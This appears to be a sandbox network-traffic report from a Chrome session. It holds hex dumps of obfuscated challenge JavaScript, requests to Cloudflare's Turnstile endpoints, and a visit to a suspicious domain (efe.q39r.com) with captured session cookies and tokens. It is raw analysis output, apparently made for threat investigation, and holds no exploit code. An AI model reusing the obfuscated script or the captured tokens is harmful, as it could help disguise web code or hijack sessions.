                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 67 50 6c 78 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4a 50 72 76 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 54 51 42 6b 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4d 6d 67 75 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 63 78 59 48 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 51 78 53 73 75 27 3a 6a 61 28 32 36 32 38 29 2c 27 66 4e 73 73 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 58 6b 61 57 6b 27 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                  Data Ascii: {return h==i},'gPlxU':function(h,i){return h(i)},'JPrvk':function(h,i){return i*h},'TQBkY':function(h,i){return h(i)},'MmguA':function(h,i){return h!=i},'cxYHD':function(h,i){return h<i},'QxSsu':ja(2628),'fNssO':function(h,i){return h*i},'XkaWk':function(
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 30 37 32 29 5d 28 61 5a 2c 62 30 29 5e 7e 62 31 26 62 32 29 2c 62 33 5b 62 34 5d 29 2c 62 35 5b 62 36 5d 29 2c 62 37 3d 62 38 2c 62 39 3d 6a 5b 6a 64 28 31 38 38 36 29 5d 28 6a 5b 6a 64 28 31 38 38 36 29 5d 28 62 61 28 62 62 2c 32 29 2c 6a 5b 6a 64 28 32 33 30 36 29 5d 28 62 63 2c 62 64 2c 31 33 29 29 2c 62 65 28 62 66 2c 32 32 29 29 2c 6d 3d 62 67 28 62 68 2c 6a 5b 6a 64 28 32 34 38 34 29 5d 28 62 6a 26 62 69 2c 62 6b 26 62 6c 29 5e 62 6e 26 62 6d 29 2c 62 6f 3d 62 70 2c 62 71 3d 62 72 2c 62 73 3d 62 74 2c 62 75 3d 62 76 28 62 77 2c 6c 29 2c 62 78 3d 62 79 2c 62 7a 3d 62 41 2c 62 42 3d 62 43 2c 62 45 28 6c 2c 6d 29 29 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 6a 64 28 38 35 39 29 5b 6a 64 28 33 33 35 32 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74
                                                                                  Data Ascii: 072)](aZ,b0)^~b1&b2),b3[b4]),b5[b6]),b7=b8,b9=j[jd(1886)](j[jd(1886)](ba(bb,2),j[jd(2306)](bc,bd,13)),be(bf,22)),m=bg(bh,j[jd(2484)](bj&bi,bk&bl)^bn&bm),bo=bp,bq=br,bs=bt,bu=bv(bw,l),bx=by,bz=bA,bB=bC,bE(l,m))}else return jd(859)[jd(3352)](i)})},'g':funct
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 45 2d 2d 2c 64 5b 6a 65 28 32 35 30 34 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 6a 65 28 35 37 31 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 6a 65 28 33 32 30 39 29 5d 28 49 3c 3c 31 2e 39 33 2c 64 5b 6a 65 28 32 33 33 32 29 5d 28 50 2c 31 29 29 2c 64 5b 6a 65 28 32 35 30 34 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 6a 65 28 32 39 34 30 29 5d 28 64 5b 6a 65 28 31 32 30 31 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 45 3d 3d 30 26 26 28 45 3d 4d 61 74 68 5b 6a 65 28 35 37 31 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 3b 63 6f 6e 74 69 6e
                                                                                  Data Ascii: E--,d[je(2504)](0,E)&&(E=Math[je(571)](2,G),G++),delete C[D]}else for(P=B[D],x=0;x<G;I=d[je(3209)](I<<1.93,d[je(2332)](P,1)),d[je(2504)](J,j-1)?(J=0,H[je(2940)](d[je(1201)](o,I)),I=0):J++,P>>=1,x++);continue;case'4':E==0&&(E=Math[je(571)](2,G),G++);contin
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 6e 28 69 2c 6a 2c 6f 2c 6a 69 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 6a 69 3d 6a 61 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 64 5b 6a 69 28 32 32 30 32 29 5d 28 6f 2c 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 64 5b 6a 69 28 34 30 30 29 5d 28 33 2c 45 29 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 69 28 35 37 31 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 46 21 3d 4b 3b 29 66 6f 72 28 4c 3d 6a 69 28 33 32 36 35 29 5b 6a 69 28 37 37 31 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61
                                                                                  Data Ascii: n(i,j,o,ji,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(ji=ja,s=[],x=4,B=4,C=3,D=[],G=d[ji(2202)](o,0),H=j,I=1,E=0;d[ji(400)](3,E);s[E]=E,E+=1);for(J=0,K=Math[ji(571)](2,2),F=1;F!=K;)for(L=ji(3265)[ji(771)]('|'),M=0;!![];){switch(L[M++]){case'0':H>>=1;continue;ca
                                                                                  2024-04-25 16:22:59 UTC1369INData Raw: 32 3a 72 65 74 75 72 6e 20 44 5b 6a 69 28 37 30 39 29 5d 28 27 27 29 7d 69 66 28 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 6a 69 28 35 37 31 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4f 29 4f 3d 64 5b 6a 69 28 31 35 32 35 29 5d 28 45 2c 45 5b 6a 69 28 33 33 35 32 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 6a 69 28 32 39 34 30 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4f 5b 6a 69 28 33 33 35 32 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4f 2c 64 5b 6a 69 28 31 38 37 37 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 6a 69 28 35 37 31 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 6a 61 28 31 34 31 35 29 5d 3d 66 2e 68 2c 67 7d 28 29
                                                                                  Data Ascii: 2:return D[ji(709)]('')}if(x==0&&(x=Math[ji(571)](2,C),C++),s[O])O=s[O];else if(B===O)O=d[ji(1525)](E,E[ji(3352)](0));else return null;D[ji(2940)](O),s[B++]=E+O[ji(3352)](0),x--,E=O,d[ji(1877)](0,x)&&(x=Math[ji(571)](2,C),C++)}}},g={},g[ja(1415)]=f.h,g}()
                                                                                  2024-04-25 16:22:59 UTC217INData Raw: 36 33 29 5d 5b 6a 7a 28 32 30 35 36 29 5d 3f 6a 5b 6a 7a 28 32 37 35 30 29 5d 28 6a 5b 6a 7a 28 32 37 35 30 29 5d 28 27 68 2f 27 2c 66 45 5b 6a 7a 28 32 31 36 33 29 5d 5b 6a 7a 28 32 30 35 36 29 5d 29 2c 27 2f 27 29 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 73 3d 28 6f 3d 7b 7d 2c 6f 5b 6a 7a 28 34 35 38 29 5d 3d 66 2c 6f 2e 63 63 3d 67 2c 6f 5b 6a 7a 28 31 37 35 34 29 5d 3d 42 2c 4a 53 4f 4e 5b 6a 7a 28 37 34 31 29 5d 28 6f 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 78 3d 6a 5b 6a 7a 28 32 37 35 30 29 5d 28 6a 5b 6a 7a 28 32 37 35 30 29 5d 28 6a 5b 6a 7a 28 32 37 39 31 29 5d 28 6a 5b 6a 7a 28 32 35 0d 0a
                                                                                  Data Ascii: 63)][jz(2056)]?j[jz(2750)](j[jz(2750)]('h/',fE[jz(2163)][jz(2056)]),'/'):'';continue;case'2':s=(o={},o[jz(458)]=f,o.cc=g,o[jz(1754)]=B,JSON[jz(741)](o));continue;case'3':x=j[jz(2750)](j[jz(2750)](j[jz(2791)](j[jz(25
                                                                                  2024-04-25 16:22:59 UTC718INData Raw: 32 63 37 0d 0a 34 34 29 5d 28 6a 7a 28 31 33 37 34 29 2c 6e 29 2c 6a 5b 6a 7a 28 32 39 39 35 29 5d 29 2b 31 2b 6a 7a 28 31 37 35 33 29 2c 66 45 5b 6a 7a 28 32 31 36 33 29 5d 5b 6a 7a 28 39 33 32 29 5d 29 2b 27 2f 27 2b 66 45 5b 6a 7a 28 32 31 36 33 29 5d 5b 6a 7a 28 32 31 38 33 29 5d 2c 27 2f 27 29 2b 66 45 5b 6a 7a 28 32 31 36 33 29 5d 5b 6a 7a 28 35 36 30 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 43 5b 6a 7a 28 39 34 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 43 5b 6a 7a 28 32 32 33 38 29 5d 3d 32 35 30 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 43 5b 6a 7a 28 31 32 39 32 29 5d 28 6a 7a 28 37 32 38 29 2c 6a 5b 6a 7a 28 31 31 35 39 29 5d 29 3b 63 6f 6e 74 69 6e 75
                                                                                  Data Ascii: 2c744)](jz(1374),n),j[jz(2995)])+1+jz(1753),fE[jz(2163)][jz(932)])+'/'+fE[jz(2163)][jz(2183)],'/')+fE[jz(2163)][jz(560)];continue;case'4':C[jz(947)]=function(){};continue;case'5':C[jz(2238)]=2500;continue;case'6':C[jz(1292)](jz(728),j[jz(1159)]);continu


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.1749715104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:59 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:59 UTC240INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:22:59 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faccfeaa207be-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:22:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.1749707172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:00 UTC1307OUTGET /favicon.ico HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/efe/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkVuTjhpYXZwWDVORVBLMVRKWWJva0E9PSIsInZhbHVlIjoieEdkZ1drMVdXMzNIV2JOSW9iQnBaaVlYcDFXNDBxWjllbm9WWGkzMWlVdlBMaU0rcC9KYkZudkRtcnk4dlEycnVrL1Y2d0hiVW5ZYkRHNEpCemNSMUpYYkJzZ0k2U2JsS1YrSEVrLzlrbDVCMHBoSkpNcTk2cnpjUldSTzcvcVIiLCJtYWMiOiJiMWMzYjljZThiNDcwMmQ0M2E3ZmQ1YTUyYTRjMjJhODc2ZjI1NDU0YzkwYzUyNDIwNWU0ZDNiYTQ3NTA5NzllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlhNTVJWE5STkZJenE5bTlJMGhzV1E9PSIsInZhbHVlIjoia3llOWIyNUR6ZVM0TEZVRE9jL25PZnNLTytUa0ZxQjgyQWk1cUJpVmZOcVg1YmVoMjdWR21ZK3NWbG9zalE1RzJIREZIUUExaXF2L2VxeStySnU2cWxqM1poQWQwazhwbjBLY0d3eUhOUkJIaFJ5NnFWdWVDT1Z4RkJBdWJlKzYiLCJtYWMiOiI5ZjdkNDFmYjFiMmZjMzk2NWNiN2I0MDY0ZjI3NTNhZjZlNGNiYTc2ZDA4ODAyZWJhZDQ4ZGZiODY3ODczMGUwIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:00 UTC650INHTTP/1.1 404 Not Found
                                                                                  Date: Thu, 25 Apr 2024 16:23:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=14400
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ozS%2FD%2BlhebByb9jaBaCRWoAEncGPbHpc01bkEyWlR9QzWHR%2FB9s%2F%2F50q%2BwlKuLB0VLH2U6N5aT1m2TFYtnVn1eP3Skjt1q0M%2BCesyWR3U00ru6Y6S3N5kKqF3Fs%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 12358
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facd2bd13134d-ATL
                                                                                  2024-04-25 16:23:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.1749716104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:00 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:00 UTC240INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:00 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facd3bc5a53b8-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:00 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.1749717104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:00 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 2629
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: f892c8713b88792
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:00 UTC2629OUTData Raw: 76 5f 38 37 39 66 61 63 63 62 66 65 38 66 62 30 36 61 3d 57 69 74 55 44 55 43 55 49 55 73 55 77 41 24 61 41 24 70 55 41 47 71 30 77 6b 41 6a 24 77 24 79 51 47 59 7a 45 24 38 6c 24 74 45 6a 34 6f 50 24 6a 45 77 42 6f 6a 46 6c 24 76 55 59 30 6f 5a 5a 24 46 73 74 55 24 46 48 55 71 2d 24 30 45 77 46 66 55 4a 24 71 42 24 68 55 77 7a 62 78 55 24 47 78 24 78 39 24 41 43 43 6a 41 36 4f 74 57 74 46 45 77 6c 24 63 55 71 78 32 24 68 48 44 34 43 79 6e 2d 24 6f 38 38 53 5a 47 6f 6b 24 57 36 6d 67 24 47 57 7a 25 32 62 5a 6a 69 33 41 55 24 65 74 45 4a 70 24 77 78 33 46 6a 30 4a 77 24 6f 46 34 4e 6b 24 6c 4e 37 6c 78 71 24 24 63 32 30 34 24 24 52 24 46 44 78 78 71 43 78 24 57 50 4b 67 24 71 52 37 24 6c 2b 30 48 5a 53 61 2d 42 69 59 63 47 24 57 24 59 52 62 70 31 69 74 49
                                                                                  Data Ascii: v_879faccbfe8fb06a=WitUDUCUIUsUwA$aA$pUAGq0wkAj$w$yQGYzE$8l$tEj4oP$jEwBojFl$vUY0oZZ$FstU$FHUq-$0EwFfUJ$qB$hUwzbxU$Gx$x9$ACCjA6OtWtFEwl$cUqx2$hHD4Cyn-$o88SZGok$W6mg$GWz%2bZji3AU$etEJp$wx3Fj0Jw$oF4Nk$lN7lxq$$c204$$R$FDxxqCx$WPKg$qR7$l+0HZSa-BiYcG$W$YRbp1itI
                                                                                  2024-04-25 16:23:00 UTC714INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:00 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cf-chl-gen: xSlyEe6UDmR6gpbyO6LBZuLP0YKf6px6N5D98felWhwB9qdP0yiGwHRCfjHYNsIWqPI/Fw+CTzaJWlYnFSTNbi9JRhSntLDGFOe2y2q/PD9Lm/L4lnJC5TXeukPRizoSZnjdwVevdK13R6MRu3F2DmlBXRe7m5kcFwj4rzRStowhziUH31zjaUJz0ywc62H9xyFZ4GW+LtIMbARU8hwSLq7PgiQt2RNeq2Wh0tfQwXL5LI92W0TShACc0KJ+9HQUlg2mAWPgtOda/3t1lgrSJM0t+61AkSIIEgtpTVV+4AFyGHhtx6Ba0xgBIY9taS8OiZM+TW8FMQ+EHb/0BD5SLkNnEDvh6ngWOIDPjWwEaANJehBb3/iM1NSR124jwrRKlYxH371wMywQggVQ5/fhXYlu0edoEuCTfCFG7yC28tE=$UCabPiEeX9s45C9nTYuteA==
                                                                                  vary: accept-encoding
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facd4aaa71377-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:00 UTC655INData Raw: 32 62 36 0d 0a 68 61 70 35 74 62 69 73 6d 70 54 45 76 73 47 6b 77 70 53 2b 76 35 65 6b 6a 63 32 44 76 35 75 6b 6a 63 32 6f 70 61 4f 31 73 35 53 33 6c 62 43 2f 32 62 48 62 6d 37 54 45 74 71 53 6d 6f 4d 4b 6a 74 64 65 6c 79 73 72 53 72 63 7a 72 73 2b 50 50 34 76 76 45 37 4c 6e 36 74 67 48 52 7a 4e 76 31 30 64 44 66 2b 39 67 46 33 66 6e 67 2b 2b 2f 48 38 64 38 4f 79 2f 58 6b 43 77 7a 75 36 50 54 31 2b 50 37 76 45 52 73 43 38 76 44 66 32 42 55 56 35 50 37 69 39 76 76 72 35 7a 44 74 4c 69 7a 75 4d 7a 49 71 44 77 49 71 39 44 67 70 46 52 63 78 51 76 51 39 4c 77 46 42 41 6a 74 4c 41 69 30 6d 42 69 51 6b 4a 67 73 70 48 78 38 4d 4a 46 6b 50 55 43 38 6f 52 30 38 31 59 55 4a 55 54 56 55 75 5a 44 73 2f 4e 32 68 57 59 43 31 72 61 45 68 6c 52 32 68 6c 56 47 41 32 61 48
                                                                                  Data Ascii: 2b6hap5tbismpTEvsGkwpS+v5ekjc2Dv5ukjc2opaO1s5S3lbC/2bHbm7TEtqSmoMKjtdelysrSrczrs+PP4vvE7Ln6tgHRzNv10dDf+9gF3fng++/H8d8Oy/XkCwzu6PT1+P7vERsC8vDf2BUV5P7i9vvr5zDtLizuMzIqDwIq9DgpFRcxQvQ9LwFBAjtLAi0mBiQkJgspHx8MJFkPUC8oR081YUJUTVUuZDs/N2hWYC1raEhlR2hlVGA2aH
                                                                                  2024-04-25 16:23:00 UTC46INData Raw: 43 47 71 58 4b 47 68 6f 68 6f 72 6f 36 50 67 6d 2b 63 68 4b 2b 4c 70 62 53 32 74 4b 57 63 66 48 75 4c 6d 4a 4f 4b 6b 61 32 79 77 49 0d 0a
                                                                                  Data Ascii: CGqXKGhohoro6Pgm+chK+LpbS2tKWcfHuLmJOKka2ywI
                                                                                  2024-04-25 16:23:00 UTC1369INData Raw: 31 37 31 33 0d 0a 57 5a 6e 6f 69 35 79 4d 6d 2f 6a 61 36 76 78 5a 32 38 73 5a 43 32 74 5a 61 58 6c 37 32 31 71 74 50 56 31 74 33 4c 32 65 44 6c 72 39 4c 43 36 63 50 63 78 38 33 65 79 61 72 77 33 2b 72 49 37 4e 66 77 7a 76 66 74 36 4f 66 53 39 62 2f 56 31 73 2f 7a 77 2f 7a 52 41 39 33 63 34 51 34 4f 39 76 6e 4f 35 4d 30 56 39 4d 66 4d 45 51 50 30 35 4e 55 50 32 4f 59 68 39 79 48 76 44 75 4c 68 38 78 51 42 2b 2f 59 42 46 79 54 73 47 51 77 71 4c 2b 6b 4f 4c 68 63 58 4a 44 45 61 4d 52 6f 33 4a 77 38 65 4f 79 51 54 49 6a 38 6a 46 79 5a 44 4a 68 73 71 52 79 30 66 4c 6b 73 77 49 69 49 67 4e 53 73 51 51 6c 56 47 48 56 59 34 4e 45 38 75 4d 31 74 56 4d 45 42 53 51 42 77 32 56 7a 56 48 4a 55 39 46 4b 6c 4a 31 51 6a 52 73 63 55 51 77 53 6a 70 4e 52 33 6c 55 64 6b 4a
                                                                                  Data Ascii: 1713WZnoi5yMm/ja6vxZ28sZC2tZaXl721qtPV1t3L2eDlr9LC6cPcx83eyarw3+rI7Nfwzvft6OfS9b/V1s/zw/zRA93c4Q4O9vnO5M0V9MfMEQP05NUP2OYh9yHvDuLh8xQB+/YBFyTsGQwqL+kOLhcXJDEaMRo3Jw8eOyQTIj8jFyZDJhsqRy0fLkswIiIgNSsQQlVGHVY4NE8uM1tVMEBSQBw2VzVHJU9FKlJ1QjRscUQwSjpNR3lUdkJ
                                                                                  2024-04-25 16:23:00 UTC1369INData Raw: 73 65 7a 6d 62 71 6c 78 4a 75 70 6a 4d 57 67 72 62 61 67 70 37 61 35 32 4a 58 58 7a 4c 54 42 73 4d 50 4d 74 4c 62 6c 32 63 6a 52 76 4e 6e 69 33 4f 37 5a 30 62 37 6d 73 2b 48 4b 30 36 37 70 77 2b 58 6b 75 4c 76 37 41 4e 4c 55 39 75 2f 38 35 4d 59 4a 38 4e 50 6e 39 66 54 70 33 65 50 43 41 74 33 7a 37 52 58 78 39 77 76 59 47 51 6b 54 2f 4e 6a 61 39 53 48 71 44 77 4c 78 2b 77 63 63 2f 68 6e 2b 43 4f 6b 72 4a 53 33 6e 45 43 6b 65 4e 76 49 30 49 6a 72 30 4e 79 59 6d 2f 44 34 36 4d 76 70 43 50 7a 66 34 53 42 78 4b 43 55 63 33 49 41 31 4c 53 30 6f 4c 55 6b 35 57 46 52 52 4f 46 30 34 53 52 31 34 38 54 43 46 65 48 31 39 66 58 7a 67 77 50 6d 67 6d 54 55 41 71 50 57 42 48 54 44 35 73 53 43 31 6e 56 6b 5a 77 65 7a 56 37 61 56 56 36 50 33 4e 73 56 44 31 54 58 6f 64 44
                                                                                  Data Ascii: sezmbqlxJupjMWgrbagp7a52JXXzLTBsMPMtLbl2cjRvNni3O7Z0b7ms+HK067pw+XkuLv7ANLU9u/85MYJ8NPn9fTp3ePCAt3z7RXx9wvYGQkT/Nja9SHqDwLx+wcc/hn+COkrJS3nECkeNvI0Ijr0NyYm/D46MvpCPzf4SBxKCUc3IA1LS0oLUk5WFRROF04SR148TCFeH19fXzgwPmgmTUAqPWBHTD5sSC1nVkZwezV7aVV6P3NsVD1TXodD
